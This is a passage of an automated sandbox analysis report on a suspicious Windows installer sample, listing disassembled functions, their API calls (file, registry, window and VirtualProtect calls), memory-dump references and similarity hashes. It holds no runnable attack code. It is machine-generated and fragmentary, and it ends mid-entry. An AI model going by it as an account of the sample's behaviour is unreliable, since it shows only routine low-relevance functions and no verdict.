                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004056C8
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(0042AC28,00000000,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 00405762
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(0042AC28,0042AC28,0042AC28,0042AC28,0042AC28,0042AC28,00000000,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410), ref: 00405772
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3248276644-0
                                                                                                                                                                                                                                                                • Opcode ID: 8b03ff19f54fddd6cded50317c21ce54d7c2962048407970c9729a0c1cf0d5b4
                                                                                                                                                                                                                                                                • Instruction ID: 8ff176f5aaeb0f14354d6cc41ea137eaa18f9097bb8f7bd8f48f6d70b4538586
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b03ff19f54fddd6cded50317c21ce54d7c2962048407970c9729a0c1cf0d5b4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45F0A435109E51A6C623323A2C49AAF1A55CE96364F58053BF854B32D2CB3C8943ED6E
                                                                                                                                                                                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: bdb71405e2a0c5aec897d6259c77254c040c55820e55e0b8689271529569ecd8
                                                                                                                                                                                                                                                                • Instruction ID: fab204b64a6227e7b492ca485547aa1deaf69a3a7d967e88ae29f10f86ebb869
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdb71405e2a0c5aec897d6259c77254c040c55820e55e0b8689271529569ecd8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F012831B242109BE7294B789C04B6A3698E710725F11863BF811F72F1D678DC029B4D
                                                                                                                                                                                                                                                                Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 849931509-0
                                                                                                                                                                                                                                                                • Opcode ID: f4ed400c453e05d82e90165a1a54b60dfa2770a8940896abf0f60c7a8af17ab2
                                                                                                                                                                                                                                                                • Instruction ID: 53bfa723240d4389843108291fedb1583fd989766778df965787cce0e335e245
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4ed400c453e05d82e90165a1a54b60dfa2770a8940896abf0f60c7a8af17ab2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1F04F72A04111ABDB51BBB49A8EAAE6268AB00318F14453BF501B71C1DAF85E01A67E
                                                                                                                                                                                                                                                                Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                                                                                                • Opcode ID: 7a08b6d27524c8f2bcd59da278bf895b6231aaf852311aef13317f2d9cf00f04
                                                                                                                                                                                                                                                                • Instruction ID: c39a0513cc250adc57ff8c1e2cc51b7a242abbfcd93ee858ef65dfb317296277
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a08b6d27524c8f2bcd59da278bf895b6231aaf852311aef13317f2d9cf00f04
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E0CD72B04110DBD710B7B45D4A55E3364DF10359B104437F501F11C1D6B85C40466D
                                                                                                                                                                                                                                                                Function 00405822 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00405826
                                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                                                                                                                                                                                                                • Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16
                                                                                                                                                                                                                                                                Function 00402519 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2111968516-0
                                                                                                                                                                                                                                                                • Opcode ID: 1b95fb6c5de9dceb638ab3b51104b016d9e3be4dca251902a50dd6d9bc821a7d
                                                                                                                                                                                                                                                                • Instruction ID: d6d0aa84f8b0bb501b14b1d69fea20307f251e2ebcbe8d2f2d3121e022689ca8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b95fb6c5de9dceb638ab3b51104b016d9e3be4dca251902a50dd6d9bc821a7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5212B70D04299BECF229F648E581EEBBB09B05304F64407BE491B63C5D1BC9A81C72D
                                                                                                                                                                                                                                                                Function 004025D3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 327478801-0
                                                                                                                                                                                                                                                                • Opcode ID: 6eab7794b4dfe1c36aa75abedecda1bfdf01b9c3e21da1313a7bc0f9937e8967
                                                                                                                                                                                                                                                                • Instruction ID: 5c6e64fcefe0017d27201ba2f5e1bf0226efa958ba722e95579819ed560bd135
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eab7794b4dfe1c36aa75abedecda1bfdf01b9c3e21da1313a7bc0f9937e8967
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9E04F76A00120BBDB01B7A59E4ADBF7768DB20319B14853BF501F10C1C7BC5C019A2E
                                                                                                                                                                                                                                                                Function 00401705 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PathSearch
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2203818243-0
                                                                                                                                                                                                                                                                • Opcode ID: e8e22b26d33e44c886833d6e8cbc9c406648bd236ad7edf85d0003c3f20bef22
                                                                                                                                                                                                                                                                • Instruction ID: b18b8bb612da985d69bbdbf5a514d2b4b729ad2f1d78be7b7ec956b08fa5ed90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8e22b26d33e44c886833d6e8cbc9c406648bd236ad7edf85d0003c3f20bef22
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EE026B2304100BBE340DB64DD48EAB7798EB10368F30863BE511E60C1E3B99902D33D
                                                                                                                                                                                                                                                                Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                                                • Opcode ID: 81d0b8bea01c40766a4e26c31b0fd2783b071aace83e065fc2e64bbefc8daaeb
                                                                                                                                                                                                                                                                • Instruction ID: e075994b4b6ec2cfc8745d1ad65b115f53658dabe6a3d6a661942630d7023fc8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d0b8bea01c40766a4e26c31b0fd2783b071aace83e065fc2e64bbefc8daaeb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75E08676250108BFD740EFA5DD47F9537ECF714704F008025B608D7091CA74F5109B68
                                                                                                                                                                                                                                                                Function 0040589A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403094,00000000,00000000,00402EB2,000000FF,00000004,00000000,00000000,00000000), ref: 004058AE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                                                                                                • Instruction ID: 6bc6e998f3f9f12d3e19600f04b58372c044213204429a002bc0a6642a8b1746
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE0B63262465AABDF10AE669C00AAB7B6CFF05361F048432BD55E6190D231E8259AA5
                                                                                                                                                                                                                                                                Function 10002724 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002742
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                                                                • Instruction ID: 652332ac7bde672dc05c446cd50b76b12c9e61f3b08479d0be882dc895827dde
